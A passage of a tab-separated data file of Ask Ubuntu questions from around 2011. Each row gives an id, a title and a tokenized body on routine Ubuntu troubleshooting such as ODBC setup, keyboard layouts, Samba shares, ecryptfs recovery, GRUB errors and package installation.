00 01 00 8b f4 b8 00 42 8a 56 40 cd 13 be |h ... ... ..b.v @ ... | 00000180 c7 7d 72 94 67 83 44 24 06 20 66 67 ff 44 24 08 |. } r.g.d $ . fg.d $ .| 00000190 e2 e3 83 c4 10 66 61 c3 66 48 66 48 66 0f b6 56 | ... ..fa.fhfhf..v| 000001a0 0d 66 f7 e2 66 03 46 fc c3 4e 54 4c 44 52 20 20 |.f..f.f..ntldr | 000001b0 20 20 20 20 0d 0a 4e 6f 20 53 79 73 74 65 6d 20 | ..no system | 000001c0 44 69 73 6b 20 6f 72 0d 0a 44 69 73 6b 20 49 2f |disk or..disk i/| 000001d0 4f 20 65 72 72 6f 72 0d 0a 50 72 65 73 73 20 61 |o error..press a| 000001e0 20 6b 65 79 20 74 6f 20 72 65 73 74 61 72 74 0d | key to restart.| 000001f0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 55 aa | ... ... ... ... ..u.| 00000200 =============================== stderr messages : =============================== umount : /isodevice : device is busy . ( in some cases useful info about processes that use the device is found by lsof ( 8 ) or fuser ( 1 ) )
60502	myodbc with mysql in ubuntu 11.04	i want to read mysql table data to an excel file . so i decide to install myodbc in my ubuntu 11.04 with these command lines : sudo apt-get install iodbc sudo apt-get install libmyodbc i start the iodbc driver manager gtk+ frontend and config odbc drivers look like in the picture : iodbcadm-gtk then i add a new user dns : try to login for dns with user = root and empty password give me this error : i windows i can use odbc without any problem . what was i wrong and missing here ? please help ! thanks in advance .
60504	how to change the keyboard-layout in the console , with special characters ?	i want to use the dvorak-fr-bepo keymap in the console ( tty1 to 6 ) when i type ctrl + alt + f1 . in particular , i need the special characters as `` ê '' or `` ç '' since there are some in my password . so directly when i installed ubuntu , i chose for the bépo layout when asked . nonetheless , the consequence is that i am able to type basic characters , but not special ones . for instance , when i typed bépo i got only `` bpo '' . on the contrary , when i used to use a french azerty layout , i could type the special characters . how do i definitely set a different keyboard-layout in the console ?
60505	what 's they key combination for the compiz grid plug in ?	i 've installed compiz setting manager . i interested in winodw management section , grid plugin . the short key for `` put center '' is kp5 , i assumed that is ctrl+alt+5 . but when i using this combination nothing changed . the num is on on the numpad . what exectly should i press to move window to the grid ? thanks . update : maybe the problem caused by virtual machine ? i 'm running ubuntu as guest machine . but another hotkeys work well .
60507	creating .deb package but bad permissions into destination folder	i 'm building a .deb package for my latest game , http : //sundaycoders.host-ed.net/download.html . everything is ok concerning files locations , menu entries and icon once deb package has been installed . the game files are installed into the directory : /usr/games/marball/ once running , the program needs to generate 2 files ( first time launch ) ( .cfg and .sav files ) but it does n't seem that the folder has permission rights to create files into it . any help with this issue ? should i add a command during the .deb package build process ?
60509	how to control fan speed on my desktop ?	i found a post on `` how to control the fan speed on my laptop '' but nothing about the same thing on a desktop . i 'd like to replicate the same thing on my desktop but till now i had not such luck . i tried to do the same thing on that post , so i followed every step . unfortunately i got stack in `` 3 . configure fancontrol '' when you execute the command `` sudo pwmconfig '' . i get the following message : # pwmconfig revision 5857 ( 2010-08-22 ) this program will search your sensors for pulse width modulation ( pwm ) controls , and test each one to see if it controls a fan on your motherboard . note that many motherboards do not have pwm circuitry installed , even if your sensor chip supports pwm . we will attempt to briefly stop each fan using the pwm controls . the program will attempt to restore each fan to full speed after testing . however , it is ** very important ** that you physically verify that the fans have been to full speed after the program has completed . /usr/sbin/pwmconfig : there are no pwm-capable sensor modules installed so when at the point `` 4 '' i execute the command sudo fancontrol i get : loading configuration from /etc/fancontrol ... error : ca n't read configuration file is what i 'm trying to do even even possible on a desktop computer ?
60524	why ca n't i buy more storage ?	im trying to buy 2x20g of storage but when i try it says `` sorry something went wrong '' .
60525	netbeans shows two icons on launcher	i use netbeans in ubuntu natty . i have added it in the launcher and it works . but there is an issue . when i start netbeans it shows two icons . one is for the launcher and the other for the active netbeans ( the latter 's icon is with little white triangle ) . is there a workaround ?
60528	best way to access a windows-xp virtual machine	i have set up a virtual machine running windows xp ( as guest ) on an ubuntu 11.04/64bit machine . the virtual host is using qemu-kvm . accessing the virtual windows using virt-manager is possible , but way to slow . using rdp with tsclient is much better , but still not that fast . is there a better way to access the guest system ? is virtualbox that much besser when accessing the graphical windows desktop ?
60529	linux alternative to `cam2pc` photo/video downloading tool ?	i 'm looking for a program that will grab media files ( photos and videos ) from my camera ( or cell phone ) via usb and download and rename them . as a benchmark , i 'm comparing against cam2pc which has some crucial features -- and i ca n't find a linux tool that handles video files as well . unfortunately cam2pc does n't run very well under wine , otherwise this question would be unnecessary . this is what cam2pc lets me do , which is what i 'm looking for on linux : start the program ( or have it start automatically when a camera device is connected ) . select from a list ( or preview ) of photos and videos to be downloaded . jpg , avi , mov must be supported . review/edit the renaming pattern that will be applied to the photos and videos after the download , in particular taking the date from their creation timestamp and not from exif because videos do n't have exif . must support a user-customizable pattern for the downloaded files , like path/year/year-month-day hour-min topic serial # .lowercase-extension e.g . photos/2009/20091218 1214 skiing with friends 003.avi ( in cam2pc , that would look like % y % m % d % h % u % p % { num:3 } . % { ext } ) click start , lean back , end of story . notes : renaming according to exif wo n't do , because video files do n't have exif data but they should be renamed to fit into the same pattern . i do n't want to do this manually for video files , after the photos have been renamed ( it 's what i do now , and it 's no fun ) . i attempted to write an elaborate shell script to copy the photo/video files and rename them according to their creation timestamp . i am not a developer or shell guru , so this quickly became too complicated . i 'm thinking there must be someone besides me that downloads video shots off their cameras , who also want to rename the shots . what to they do ? ! most photo-management tools i 've found ignore video altogether , and they certainly ca n't rename them . if anyone can point me to a program that does this ( well ) , i would be most grateful !
60533	how do i save all images from .xls file ?	i 've got a xls file with exactly 167 images that i must save and post on a website . the sheer number itself is painful , but what complicates things is that you ca n't directly save images from calc - you need to copy it to writer first and then save . this is n't the way i would like to do things , so is there a way to save all the graphics in the file somehow ?
60540	panel theme reverts to standard gnome in indicator area	my top bar looks normal up to the point where the indicators appear . the theme and icons do n't apply there and it looks like this i do n't know why but that little part of the bar with indicators never changes to the look it 's supposed to . can anyone tell me how i can fix this ?
60543	installing a group of .deb files	i have a directory of .deb files which i copied from the cache folder of apt . there are many applications and ubuntu updates among them . but there 's no dependency failure because they were all downloaded by 'add/remove applications ' and 'update manager ' automatically . now i have installed the same version of ubuntu ( 9.04 ) and i want to install those apps and updates again ( though they are not new versions ) . in other words , i want to make this fresh ubuntu install exactly like the old one but without downloading any thing and using only those .deb files that i copied . all i have is an archive folder containing the .deb files and a 'pkgcache.bin ' file . i know i can double-click the .deb files and install them manually but then i have to find out and follow the dependencies one by one from the installer errors . i have also tried adding an offline repository but it did n't work . i think because all of my .deb 's are in on folder , and there is no separate 'main ' , 'restricted ' , ... folder ? ! is there a way to do all of this automatically ?
60547	how to index a pdf document ?	i am reading a pdf document in ubuntu 11.04 using the default `` document viewer '' . the document is more than 500 pages and it takes a while to complete a `` find ... '' for a particular text . is there a way to index the pdf documents on the above mentioned platform ? i am looking for a functionality inbuilt into the reader itself .
60551	how to start and kill the procedure ?	i have some runnable-jar files . i want to run them at regular intervals and also kill those processes after some time . i am a newbie when it comes to ubuntu or linux in general . can anybody suggest me the best practice to achieve it ?
60557	left ctrl key opening help and right ctrl key prints `` x ''	i do n't know how , but somehow the ctrl keys on my keyboard have messed up . left ctrl key is opening a help window and right ctrl key prints the `` x '' character . i tried setting/re-setting keyboard shortcuts and rebooting the system but that did n't help . any suggestions ?
60558	how i can turn off unknown webserver ( apache probably ) ?	i want to start xampp apache server but it terminal it says that another web server daemon is already running . so i want to find out how to turn off it or so . when i go to localhost i get following message : it works ! this is the default web page for this server . the web server software is running but no content has been added , yet . when i go to localhost/index.php i get this message : not found the requested url /index.php was not found on this server . apache/2.2.14 ( ubuntu ) server at localhost port 80 but it worked when i was starting xampp apache and going to localhost earlier , it would open my index.php page and now i ca n't start it . i 'm not sure if that webserver is apache , but i 'm just telling what happens when i go to localhost so what i should do ? i am using ubuntu 10.04
60564	how do you change the search location of the music lens ?	my music collection is on a separate partition and not under /home/username/music . how do i get the music lens in unity on ubuntu 11.10 to search in a different location ?
60566	i want to share my `` / '' in samba . how to make it editable in windows networking ?	i just can make it readable , do n't know how to make it writeable [ root $ ] path = / create mask = 0755 valid user = myname browsable = yes p.s . what 's the create mask ? and i 'm using ubuntu server 11.0
60569	black screen after installing kernel 3.0	welcome , i have install kernel 3.0 on ubuntu 11.04 natty , but i got an black screen during login to ubuntu . this screen appear on login screen , but i enable num-lock and type my password and hit enter ( without seeing login window ) to login to ubuntu .
60570	how can i get the touch screen working on a motion computing m1400	i picked up a motion computing m1400 for cheap and was successful in getting 11.04 installed on it but have run into trouble getting the touch screen to work . this is one of the older tablet pcs that need a special pen for the touch screen . there are instructions out there for older versions of ubuntu but they usually rely on a package called wacom-tools that is no longer in the repos . is there any support for these old tablets or has time passed them by ?
60571	caps lock problem	i 'm not a shifter . when i use upper-case characters i use the caps lock . however on ubuntu when i turn caps off , then hit the next character ; it 's still active . it 's like i hit the next character faster than ubuntu can turn caps off . example text when i type fast ( normal ) its very irritating , especially whilst programming ... keyboard : razer lycosa mirror i 'd appreciate any help . thanks in advance .
60573	web forms not displaying on ubuntu 11 gnome	i have a weird little quandary . we have an older pc ( sony vaio ) with less than a gig of ram . as such , i 'm running ubuntu 11 classic ( no effects ) on it . we have both google chrome and firefox installed on the computer . up until two days ago , web forms were displaying perfectly . now , text entries on web sites are not displaying ( they appear as 5 pixel x 5 pixel dots that you ca n't enter text into ) . this happens on both web browsers . what happened ? how do i correct this issue ?
60575	is it possible to use mouse buttons as toggles ?	an application i use requires me to hold lmb pressed for very long time . this may be uncomfortable . is there any way , to get mouse button stay pressed event though i have released ? a toggle-like behavior would be okay .
60577	can the same partition be used for both plain text swap and encrypted swap ?	in natty swap does not work . it has been corrupted and even gparted does not recognize its type . maybe it is due oneiric daily that i installed in the same computer and it uses the same partition as encrypted swap . ( i have encrypted /home folder in both distributions . ) can oneiric use this as encrypted swap , if i repartition the partition as linux-swap and use it unencrypted in natty ?
60579	intel gma 4500m screen resolution problem	i was previously running 10.10 on my acer aspire laptop . it has intel gma 4500m integrated graphics and worked just fine . great display , sharp , crisp , etc . i decided to do a fresh install of 11.10 oneiric and now am having problems . originally i was getting the dreaded blank screen where the brightness was turned almost completely off . some searching pulled up several easy fixes ( editing grub ) . right now i am still having one issue . the screen resolution is stuck at a max of 1024x768 giving me a distorted screen . is there any way to fix this issue ? i 've googled , searched ask ubuntu and also spent time on the forums looking for a solution . thus far , nothing . apparently , was and still is a concern in natty ? any help would be greatly appreciated .
60580	need help compiling sdl as a windows executable on ubuntu	i 'm trying to compile jumpnbump to run on windows , from ubuntu and it 's giving me a very hard time . somebody made a port , that i have to compile myself because i needed to change the controls . there is a globals.h file , where i just changed a few ascii codes . i managed to install all sdl libraries in linux and used makefile to create a working linux executable . however making a windows executable is not really working . this is the first time i try cross-platform compiling , so i 'm probably missing a lot of info . i have all the sdl files as dll 's at the ready , and installed mingw but i 'm stuck there . there 's no configure script , and the makefile script , as far as i can tell , is meant for linux . here 's the source : http : //jumpnbump.sourcearchive.com/documentation/1.50-9/files.html background info : we 're trying to get jumpnbump running on an arcade machine for 4 players . because of some nasty keyboard overlap , 2 bunny 's move when 1 button is pressed , which breaks the game . it would however be solved if we can compile the current source we have . you can get an honorable mention in the credits of the arcade machine if that 's something you 're interested in . update i managed to find a different package that does feature a configure script . when i run this sudo path=/home/joon/desktop/dlls/runtime : $ path ./configure -- host=i586-mingw32msvc -- build=i386-linux it tells me : configure : error : sdl_mixer is not installed ! get it from http : //www.libsdl.org/projects/sdl_mixer i do however have it installed , and furthermore , should n't it look for the dll rather than my linux install ?
60581	how can i back up files from multiple accounts ?	how do i use ubuntu one to backup files belonging to three different user accounts on my laptop - mine , my wife 's and our business files , each of which has its own login account and therefore own copies of documents , etc . when i try to backup ( say ) my business files , my own personal ubuntu one account is the default and there is a conflict of folder names . it happens similarly with my wife 's files . is it just a matter of registering two more ubuntu one login account ?
60586	how to check if xvfb is ( already ) running on display :0 ?	title says it all . pgrep xvfb only does half of the trick . it will not tell me the display number .
60591	how to use spice ?	i tried to use spice with qemu to use with a windows xp virtual machine on ubuntu 11.04/64 bit . i followed these instructions : http : //docs.cslabs.clarkson.edu/wiki/spice i ended with these problems : the newly compiled version of qemu conflicted with libvirt ( apparmor ) as a result i could not use virt-manager starting the vm without virt-manager was possible , but i did not have a network connection inside the vm is there a reliable way to install spice in ubuntu 11.04 ?
60594	replace the desktop by an application : two exact same set-ups : one works , the other does not	i followed the question how do i replace the desktop by an application religiously and was very excited when it worked on my laptop . ( dev environment ) . the next step for me was to replicate it on a touch screen kiosk ( production environment ) to prevent users to be able to log onto the os . i now have two environments with exactly the same files , permissions and folders on both : i even checked the /etc/gdm/custom.conf file . the only difference is that on the working envirenment file //usr/share/xsessions/custom the line is : exec=/home/kiosk/.xsession where on the other production kiosk the line is exec=/home/kioskoo/.xsession both matches the users on the systems . the only difference between the two environments is that on the working version i have apache2 installed and no apache install on the one that does not work . weird , i know . any ideas ? i have even pasted the text in a document to compare hoping i would find a difference . i can make that available too . i need to make it work on the production kiosk asap , so any help/pointers/ideas will help ! ** additional information : ** sergey and takkat , i do apologise for not making it clear . tthe specially created user , ( kiosk00 ) supposed to open firefox without starting gnome , is specified in the login screen with user defined session set as default session . when i start the pc , the correct uid will be launched , but gnome is started : it is as if the .xsession is not read ? ? files , permissions and text : 1 ) drwxr-xr-x 6 root root 4096 2011-09-08 21:30 gdm //etc/gdm/custom.conf -rw-r -- r -- 1 root root [ daemon ] timedloginenable=true automaticloginenable=false timedlogin=kiosk00 automaticlogin=kiosk00 timedlogindelay=30 defaultsession=xsession 2 ) drwxr-xr-x 2 root root 4096 2011-09-08 21:46 xsessions //usr/share/xsessions/custom -rw-r -- r -- 1 root root [ desktop entry ] name=custom comment=custom session to run ~./.xsession exec=/home/kiosk00/.xsession x-ubuntu-gettext-domain=gdm 3 ) drwxr-xr-x 28 kiosk00 kiosk00 4096 2011-09-09 20:20 kiosk00 //home/kiosk00/.xsession -rwxr-xr-x 1 kiosk kiosk # ! /bin/bash -- login gnome-wm & firefox logout
60596	how do i copy from a mac os x partition to my ubuntu desktop via root access ?	i 've installed the package nautilus-gksu in order to open files on the mac partition via right-click . however , i can not manage to copy files from my macintosh hd to my ubuntu desktop ! it appears as if i can only copy to the directory /root . however it is not possible to copy from /root to my ubuntu desktop .
60599	machine becomes totally unresponsive whilst modifying files via samba	apologies for cross-posting this from the ubuntu forums , but it feels like questions often go completely unanswered there . i 've had this problem a few times now , and it 's really worrying me , as it means i have to hard reset . normally ubuntu is so stable ! i have samba set up on an ubuntu server ( 11.04 ) , sharing a directory mounted on a raid 5 array managed by mdadm . if i access this via a windows pc , and modify a large number of files quickly ( e.g . some bulk edit operation , in this case applying changes to tags of music files ) , the server becomes completely unresponsive . by that i mean the connection is lost , i ca n't ssh into or ping it , and pressing keys on the keyboard does nothing ( which i can see if i log on locally first ; after the lock up the terminal does n't respond at all ) . i left it for about an hour last time this happened and it did n't get any better , so i had to hard reset it , which i really do n't want to do again . also , just waiting is n't really a good solution , i 'd expect it to always be responsive . this has happened 3 or 4 times now , and seems completely repeatable - i get around it by modifying smaller batches of files . that said , it happened just now after copying about 10mb to it . any ideas ?
60600	how do i replace gedit 3.06 with gedit 2.30.4 ?	i have some problem . i have installed gnome 3 , and now i have gedit 3.0.6 version . i need to replace it by gedit 2.30.4 version . any suggestions ?
60601	unwrapping passphrase and inserting into the user session keyring failed	after entering the correct passphrase at the command ecryptfs-mount-private , i am getting this error : torben @ torben-nettop : ~ $ sudo ecryptfs-recover-private info : searching for encrypted private directories ( this might take a while ) ... info : found [ /media/0f417b42-11a0-4539-9cae-e11ce3b289c3/home/.ecryptfs/ torben/.private ] . try to recover this directory ? [ y/n ] : y info : enter your login passphrase ... passphrase : error : unwrapping passphrase and inserting into the user session keyring failed [ -5 ] info : check the system log for more information from libecryptfs torben @ torben-nettop : ~ $ syslog has this information : ecryptfs-insert-wrapped-passphrase-into-keyring : incorrect wrapping key for file [ /home/torben/.ecryptfs/wrapped-passphrase ] ecryptfs-insert-wrapped-passphrase-into-keyring : error attempting to unwrap passphrase from file [ /home/torben/.ecryptfs/wrapped-passphrase ] ; rc = [ -5 ] -- > given that i am absolutely sure that i am entering the correct passphrase , what can i do to fix this problem so that i can read the encrypted home folder ? some background : i have installed ubuntu 11.04 on a new drive and i want to copy my home folder from the old drive , which is encrypted ( i have the passphrase ) . with the help of marco ceppi in the chat , i followed these precise steps yesterday and successfully gained access to the encrypted home folder . this proves that my passphrase does indeed work . i then started the machine on copying from the old encrypted home folder to the new unencrypted home folder and went to bed . when i returned to the computer , i saw that it had suspended itself : ( and had not finished copying the folder . i rebooted the computer , and removed the temporary /recovery folders , then followed the exact same steps again , but this is when i encountered the error given above . i tried this several times ; always the same result . i am absolutely sure that i am typing the passphrase correct .
60606	how to make a custom boot-up splash animation	i just found some cool boot-up video and audio file , and i want to make a custom boot-up animation in ubuntu 11.04 . any suggestions ?
60608	how can i have fedora like system-config-* , system-config-network-tui in ubuntu 11.04 ?	how can i have system-config-network-tui or all those system-config-* text user interfaces so that i can use or configure my ubuntu box using ssh terminal or serial console terminals .
60611	downloading and installing latest version of kile	in the tex - latex group of stack exchange , i posed a question about the versions of texlive under ubuntu . as i have installed the latest version of texlive under ubuntu , i want to be able to use it when running an integrated development environment like kile . though a solution ( and fix ) was presented on the kile support discussion group , it involves downloading , compiling and installing the latest version of kile . in order to compile kile , i need : kde libraries 4.2 or better qt 4.5 or better cmake 2.6.2 or better a recent c++ compile , for example gcc 4.4 my problem is that i ca n't determine what version of the kde libraries or qt i have installed on my system . note that i am running ubuntu version 11.04 . my question , however , is whether or not the latest version of kile ( version 2.1 ) will be included in the next release of ubuntu ( i.e . version 11.10 ) . if so , i could save myself the effort and grief of compiling and installing kile . if not , will my installing the latest version affect the synaptic package manager 's ability of applying any future releases/updates to kile ? any help/suggestions would be appreciated .
60613	virtual box has trouble opening its own .vdi images	for some reason virtualbox keeps saying it has trouble opening its own .vdi images exit code : 1 result code : ns_error_failure ( 0x80004005 ) component : machine interface : imachine { 5eaa9319-62fc-4b0a-843c-0cb1940f8a91 } /etc/init.d/vboxdrv setup root @ vaio-vpceb23fm : ~ # /etc/init.d/vboxdrv setup bash : /etc/init.d/vboxdrv : no such file or directory what command will reset everything so i can use it again ?
60616	rvm is not showing up except when i log in remotely	i installed rvm , like you 're supposed to do ( apparently ) , avoiding apt-get to handle my ruby installations ( as @ btelles points out here : http : //stackoverflow.com/questions/2225881/passenger-installation-with-nginx-fails ) however , i can only see rvm when i log in remotely via ssh . when i log in locally , there 's no indication of rvm anywhere on the system . when i type into a terminal when logged in locally : which rvm the result is nothing . when i run the same thing from the command line remotely via ssh , i get : xxx @ xxxx : ~ $ which rvm /usr/local/rvm/bin/rvm what should i do to get ruby running from the local machine ? edit : started a bounty because i really need this to be solved . ubuntu should play nice with rvm in rvm 's default installation , and the fact that it does not is extremely frustrating , to say the least .
60619	why does n't unity 's dash recognize all games on my system ?	i have many more games in /usr/games than show up in unity 's dash . if i do a search for games using unity , a lot of mine are skipped . how does unity decide what category a piece of software belongs to ?
60620	panel and launcher disappeared after using ccsm and resetting to defaults	i am using ubuntu 11.04 . last time i just installed compiz and ccsm from the software centre . after i opened it , i made some common changes and then reset to defaults . but then my complete panel ( as well as my dock ) had disappeared , and after rebooting it was still gone . i also tried deleting the .config file for compiz , and using commands to restore gnome .
60628	why do some commands execute properly only when the file being called is inside the working directory	i 'm unable to successfully make a file when i do the following command make /home/me/desktop/folderwithmakefile however an executable is created when i do the following cd /home/me/desktop/folderwithmakefile /home/me/desktop/folderwithmakefile make
60633	how to scroll in any direction with evince pdf viewer using mouse dragging	when viewing large pdfs with small print where one has to zoom in to be able to read even on fullscreen , it would be nice to be able to move the 'paper ' with the drag of the mouse ( hand cursor type ) . is there also a solution for dragging left -- right using the touchpad ?
60634	how do i update envisage v3 to envisage v4	i just installed the envisag 3.x plugin from the ubuntu software center , my question is , how can i update this to envisage 4.x . i 'm using python 2.6 and ubuntu 10.04 lts 64bit
60646	stream music from ubuntu one to several phones ?	i am about to buy an android-phone to myself and another one for my son . the `` killing application '' is this offer form ubuntu one : `` music streaming enjoy your music anywhere and get 20gb of storage for just $ 3.99 per month '' . i just need to know : with such a deal , can i use two ( or more ) phones ? best , lars
60649	how do i resize the partition of a ubuntu-server ?	is there an easy way to decrease the disk volume on a ubuntu server ? i run a virtual environment and need to decrease my disk volume since i 'm running out of space in my non virtual environment .
60653	how do i fix a kernel not found grub error ?	i am using ubuntu 11.04 using wubi . it was working fine till now . when it suddenly gave me a error . when i select the ubuntu option in grub on start up , it opens for a second and the suddenly a grub cli opens up . and when i write boot in the cli it says kernel not found . how can i use ubuntu 11.04 without loosing any of my data ?
60655	apache server takes too much time to resize a image	i have a lamp server which runs php script . i use this script https : //github.com/blueimp/jquery-file-upload/blob/master/example/upload.php which automatically uploads and resize the image to the defined resolution . i have a problem now . a 5mb file takes about 6 seconds to finish the full job . if i queue up 10 files for upload the server is not responding for other requests . and the both cores of the processor are at 100 % use . i have the full access to the server . what should i do to reduce the work load of the server . is the problem on the scripts or should i use any pluggins for resizing..
60657	likewise open auth to ad	i have installed likewise open via apt-get on 11.04 server 32 bit and have sucessfully joined our domain . however when trying to login via putty using a domain account i can not complete the authentication . auth.log looks like this : sep 9 10:00:45 alfocr sshd [ 1196 ] : pam_unix ( sshd : auth ) : authentication failure ; logname= uid=0 euid=0 tty=ssh ruser= rhost=timwin7-pc . *****.co.uk sep 9 10:00:47 alfocr sshd [ 1191 ] : error : pam : authentication failure for illegal user *****.co.uk\\\\talexander from timwin7-pc . *****.co.uk sep 9 10:00:47 alfocr sshd [ 1191 ] : failed keyboard-interactive/pam for invalid user *****.co.uk\\\\talexander from 10.168.** . ** port 50145 ssh2 sep 9 10:00:57 alfocr sshd [ 1198 ] : accepted keyboard-interactive/pam for ocradmin from 10.168.** . ** port 50160 ssh2 sep 9 10:00:57 alfocr sshd [ 1198 ] : pam_unix ( sshd : session ) : session opened for user ocradmin by ( uid=0 ) i am guessing that the extra \ characters are what is causing it to fail but i can not work out where they are coming from . i have tried logging in with domain\username and domain\username but neither seems to work . does anyone have any suggestions ? edit : turns it that it is possible to login via the console ( form the box itself ) . so it must be an isue with how putty is passing the commands . anyone come across something like this before ?
60659	file manager how to scp , ssh key files , basic ssh , ftp , windows share , webdav ( http ) , secure webdav ( https ) ?	how can i do from ubuntu default file manager , `` connect to remote server '' with different services such as `` amazon cloud connnect using ssh key file , scp , general ssh , ftp , public ftp , windows share , webdav ( http ) , secure webdav ( https ) '' . note : using different applications for each services is no more required , like in fedora 15 , gnome 3 . where they had all shifted as default , easy to upload large files even connected over vpn or etc . can we have this in ubuntu/how ?
60664	does ubuntu allow me to get a synced login screen on boot that can be used by multiple computers ?	i might be setting up ubuntu for a small school , but this school has an existing windows network that allows students to log in before actually entering the desktop . each student has a small folder containing all their files on the network that they can access after booting and logging in . they access programs from the pc itself , but can not enter the programs ' folders . can i do the same in ubuntu ? is this compatible with the existing windows network ? if not compatible , would it be workable to make a backup of the current network files , switch the whole network over to ubuntu and get the files running again ? i understand that the users would have to be reinserted , but i guess that 's doable .
60666	error message when opening libreoffice 3.4	sometime back - a month i think - when trying to install libreoffice 3.4 ( not from ubuntu repository ) , without uninstalling libre office 3.3 , i installed it , and it was successful too . but felt that it was still booting to 3.3 , so i uninstalled through synaptic , and then installed libreoffice 3.4 . it was successful too , and i have all the latest features . but , i am getting this message every time i open libreoffice - word , calc or anything ... . in a pop up box : libreoffice 3.4 error loading basic of document file : ///home/office/.libreoffice/3/user/basic/dialog.xlc/ : general error . general input/output error can anyone suggest how to solve this..
60667	apply icons to bash scripts	i created a script for xchat according to this answer , and i was wondering if there is anyway to apply xchat icon to it .
60672	how do i use oom_score_adj ?	on 11.04 , /proc/ [ pid ] contains oom_score_adj , but man proc describes the old oom_adj . i have googled unsuccessfully for any information on how to use this . what i need to arrange is that processes started by 'pbs ' or 'gridengine ' are killed before anything else gets killed . how can i do that ?
60676	will unity 2d continue using metacity or will it use compiz ?	i 've heard that unity-2d will be using compiz in 11.10 - is that correct ?
60677	how to access grub 2 in a computer with only ubuntu ?	i want to start the recovery mode on an ubuntu-only machine . the problem is that machine seems to skip grub and boot directly into ubuntu ( as it is the only os installed . how can i boot into the recovery mode ( whether it is through grub or not )
60680	how do i make firefox run shell commands on application protocols ?	is there a way to make firefox accept bash commands to handle an application protocol ? currently , i am opening irc : // links in xchat from firefox via a shell script as described in this answer . i would like to eliminate the script step and directly move on to opening the link in xchat .
60683	login and install packages when no dm is installed	i recently updated a few machines to 11.10 . on one of them , the promt to chose between gdm and lightdm . i tried selecting light dm , but the upgrade tool inevitably returned to the same prompt . i then chose gdm and the upgrade completed . but now when i tried to boot , the computer presents no login screen . i 'm thinking that it 's because gdm was uninstalled in the upgrade process . how can i install lightdm or gdm without logging in traditionally ? ps : apt-get does not seem to work in recovery mode .
60684	mp4 converting problem	i have sony walkman and i had convert flv video to mp4 but sony walkman still can not read it and give an error ' can not play file format can not supported'.. i also had tired to convert it by ffmpeg and avidemux . i using sony walkman nwz-a726
60686	how do i prevent gwibber-service from starting automatically ?	i 'm searching for a way to prevent gwibber-service from starting , but i can find none under oneiric . for a start , i confirmed that `` start service at login '' was still unchecked in gwibber preferences ( it is ) , but gwibber-service still starts automatically at each login . so , i cross-checked under `` startup applications ... '' ( there is no entry for gwibber there ) , i searched to see if there 's an upstart job for gwibber-service ( there is none ) , and i looked for a gwibber-service script in /etc/x11/xsession.d ( there is none ) . so , i 'm out of ideas . do you know how to prevent gwibber-service from starting , or do you know other places where to look ? for further context , i had the `` start service at login '' option already unckecked before upgrading to oneiric . it used to work under natty , but it no longer does .
60688	is there a program that can edit pdf black/white levels ?	i have used the simple scanner ( really nice app , by the way ) to scan some sheet music . looks nice but it 's picking up too much detail and would like to adjust the levels . sadly , the gimp fails so miserably here that it 's unacceptable to use it . the pdf programs in the software-center are all incapable of doing that as well . i 've looked at pdf studio ( the commercial linux pdf editor ) and it does n't look like you can do that as well . am i doomed to use a friend 's photoshop in windows ? this will be for a high quality , 50 page document . in gimp , one must edit each individual layer . there is no batch processing applicable ( unless i 'm missing something ) . further , i can not export as pdf ( or .ps or dejavu ) again . please , no roundabout workarounds ( i intend on editing about 100 50-page documents and would rather not spend time fiddling around with programs that are n't suitable ) .
60690	thunderbird `` building summary file for inbox '' error	recently i have upgraded the ubuntu version 9.10 to ubuntu 10.10 . after that if i open thunderbird my system gets hang and it is becoming too slow . the error i get is `` building summary file for inbox '' .
60694	how do i hide hidden files in gnome-do ? is the plug-in broken ?	gnome do has a by default installed plugin which - when activated - offeres to search your computer . you can decide which directories to search and how deep . however , you may not index too much since it would get slow then . this is why it would be very beneficial to hide hidden files and hidden directories ( e.g . in the home folder ) . there is an option in the default plug-in , which should allow to hide/show hidden files . but it 's not working . is this a bug ? what can i do to fix it ? a re-install did not help . i 'd like to stay with gnome do since i can browse directores with it .
60697	how to update filezilla on ubuntu ?	until now the filezilla software on my pc is version 3.3.5.1 but on filezilla 's website http : //filezilla-project.org/download.php ? type=client the latest version is 3.5.1 now . i have check the packages website and synaptic package manager on my ubuntu . my filezilla is same on package . http : //packages.ubuntu.com/natty/filezilla but i want to install the latest filezilla on ubuntu . not version 3.3.5.1 by 2010 . because i use filezilla frequently . so i think it is an important software to me . but what can i do for updating my filezilla now ? do i need to build from source ? or some other choice ? can someone help me ? thank you very much .
60698	how do i stop the unity launcher from hiding behind other windows ?	the unity launcher tends to put itself in the background of any windows sometimes . it does not occur on startup , just randomly after some hours of usage . how do i bring it back to front without restarting my computer/destroying my gdm session ? . it was hard to get a picture of both the dash and the launcher since the dash captures the prt scrn key . although the dash will hide behind any other windows too . after some further use , my pc froze for a brief moment ( it 's under heavy load from render jobs ) , now dash and launcher shows correctly in front of everything .
60705	how can i make lcms available to imageinfo ( via imagemagick ) ?	when i try to run : imageinfo -- iccname test.jpg i get the following error : imageinfo : installed imagemagick does not support lcms even though imagemagick ( 6.6.2-6 ) is set-up to use lcms : delegates bzlib djvu fontconfig freetype gvc jpeg jng jp2 lcms lqr openexr png rsvg tiff x11 xml wmf zlib libs -lmagickcore -llcms -ltiff -lfreetype -ljpeg -llqr-1 -lglib-2.0 -lfontconfig -lxext -lsm -lice -lx11 -lxt -lbz2 -lz -lm -lgomp -lpthread -lltdl ( output from convert -list configure | grep 'delegates\|libs ' ) any ideas how to make it work , if it 's possible at all ?
60708	how do i undo a postconf command ?	i was trying to setup spam filtering on ubuntu server with postfix and dovecot already running . i issued the following command sudo postconf -e 'content_filter = smtp-amavis : [ 127.0.0.1 ] :10024' now i want to know how can i undo this command ?
60709	how to use two mouse separately ( two different pointers )	i have two monitors and two mice . there is only one mouse pointer which both mice control . but i want two different controls for the two different mice , hence two different pointers . is there any solution available ? it is okay if one pointer works on only one monitor .
60712	how do i quickly encrypt a file with aes ?	i want to encrypt a file using aes-256 . how can i do that quickly and easily , and how can i - or someone else -decrypt it again ?
60715	can i reset unity 2d ?	i was playing around in unity 2d , and i messed up my configuration . how can i reset it , preferably without losing other config files ? ( such as empathy config , firefox/chrome config , etc )
60720	clear ubuntu one ( web ) contacts overview	is there a way to clear the log on ubuntu one ( web ) about your contacts overview like recently added , removed , ect . ?
60721	how to install aptitude without an internet connection ?	i 've just installed ubuntu 11.04 and there no internet connection . firstly i 've tried sudo apt-get install aptitude , but it says that there 's no installation for this . then i downloaded on usb memory apt_0.8.3ubuntu6_amd64.deb package ( as i understood that this package has aptitude installation ) and installed it . then i tried sudo apt-get install aptitude and again no success . how to install aptitude without internet connection ?
